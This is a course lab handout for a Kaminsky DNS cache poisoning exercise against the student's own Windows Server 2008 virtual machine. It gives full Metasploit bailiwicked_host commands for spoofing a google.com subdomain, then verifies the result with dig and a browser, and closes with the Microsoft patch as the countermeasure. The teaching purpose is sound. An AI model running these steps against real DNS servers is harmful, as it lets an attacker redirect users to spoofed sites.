CNIT 40 Proj 7: Performing the Kaminsky Attack (15 pts.)

What You Need for This Project

Purpose

Perform the Kaminsky DNS cache poisoning attack on your vulnerable Windows Server 2008 server.

Testing your Windows Server 2008 DNS Server

On your Windows Server 2008 machine, in a Command Prompt, execute this command:
nslookup samsclass.info 127.0.0.1
If it times out, try it again.

You should see replies, with two IPv4 and two IPv6 addresses, as shown below:

Finding the Source Port

The reason Server 2008 is vulnerable is lack of source port randomization.

To perform the attack, we need to know that source port.

It is possible to determine the port by running your own DNS server and making it authoritatice over a real domain, then sniffing incoming traffic as queries are made to the target server.

But in our test environment, it's simpler to just cheat and find the source port from the server.

On the Windows Server 2008 machine, start Wireshark sniffing, and filter it for dns traffic.

On your Windows Server 2008 machine, in a Command Prompt, execute this command:

nslookup yahoo.com 127.0.0.1
In Wireshark, stop the capturing.

In the upper pane of Wireshark, click on one of the DNS packets.

In the middle pane of Wireshark, expand the "User Datagram Protocol" section.

Right-click on "Source port" and click "Apply as Column", as shown below:

Now you can see the Source Port values, as shown below.

There are only two values present: 53 and one other value. That other value is the Source Port you need to perform the attack.

In the figure below, the Source Port is 52669.

Find your Source Port and make a note of it.

Start your Kali Linux machine.

In a Terminal window, execute this command, replacing the IP address with the address of your Windows Server 2008 DNS server:

dig @192.168.119.191 google.com
You should see IP addresses in the ANSWERS section, as shown below.

If you don't see replies, you need to troubleshoot your networking.

On your Kali Linux machine, in a Terminal window, execute this command:

msfconsole
After a few minutes, Metasploit launches, as shown below:

In Metasploit, execute these commands:

use auxiliary/spoof/dns/bailiwicked_host

show options

A list of options appears, as shown below:

In Metasploit, execute these commands, making these two changes:

set RHOST 192.168.119.191

set HOSTNAME YOURNAME.google.com

set NEWADDR 159.203.238.50

set SRCPORT 52669

set XIDS 50

run

When you see the message "Attempting to inject a poison record...", as shown below, the attack is underway.

Note: the figure shows an old address for my server starting with "199", not the current address.

Sniffing on the Target

While the attack is proceeding, start Wireshark sniffing on the Windows 2008 Server target again.

Stop it after a couple of seconds.

Scroll till you see a query for a nonsensical host like "Pu8bgh0fqDTyjqSwo.google.com" as shown below:

Saving a Screen Image

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Make sure you can see at least one nonsensical host like "plRLnNOpz2W5.google.com".

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-DESKTOP IMAGE FOR FULL CREDIT!

Paste the image into Paint and save it with the filename "YOUR NAME Proj 7a", replacing "YOUR NAME" with your real name.

Successful Attack

The attack may take as many as 14000 queries, but it usually succeeds by 4000 queries. It it takes longer, check your SRCPORT value.

When the attack succeeds, you should see the message "Poisoning successful", as shown below.

On your Kali Linux machine, in a Terminal window, execute this command, replacing the IP address with the address of your Windows Server 2008 DNS server and "YOURNAME" with your name, as you did previously:

dig @192.168.119.191 YOURNAME.google.com
It returns the address you specified earlier, 159.203.238.50, as shown below.

Note: the figure shows an old address for my server starting with "199", not the current address.

Changing the DNS Resolver

On your Kali Linux machine, in a Terminal window, execute this command:
nano /etc/resolv.conf
Change the IP address in this file to the IP address of your Windows Server 2008 DNS server, as shown below.

Save the file with Ctrl+X, Y, Enter.

Troubleshooting

If you get an "access denied" message, do this:
chattr -i /etc/resolv.conf

On your Kali Linux machine, in a Terminal window, execute this command, replacing "YOURNAME" with your name, as you did previously:

dig YOURNAME.google.com
It returns the address you specified earlier, 159.203.238.50, as shown below.

Note: the figure shows an old address for my server starting with "199", not the current address.

Viewing the Spoofed Domain in Firefox

In Kali Linux, at the upper left, click the round blue icon to open Firefox.

In Firefox, go to this address:

http://YOURNAME.google.com

Although the address shows a server at google.com, the page is obviously not a Google page, as shown below.

Saving a Screen Image

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Make sure you can see YOURNAME.google.com in the address bar, and a page that is obviously not Google, such as my page, as shown above.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-DESKTOP IMAGE FOR FULL CREDIT!

Paste the image into Paint and save it with the filename "YOUR NAME Proj 7b", replacing "YOUR NAME" with your real name.

Countermeasures

Microsoft issued a patch for this vulnerability, so if you update your server it will presumably stop being vulnerable:

http://technet.microsoft.com/en-us/security/bulletin/ms08-037

Turning In Your Project

Email the images to me as an attachments to an e-mail message. Send it to: cnit.40@gmail.com with a subject line of "Proj 7 From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Sources

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

DNS Cache Poisoning Demo (YouTube)

http://technet.microsoft.com/en-us/security/bulletin/ms08-037


Last modified 10-24-17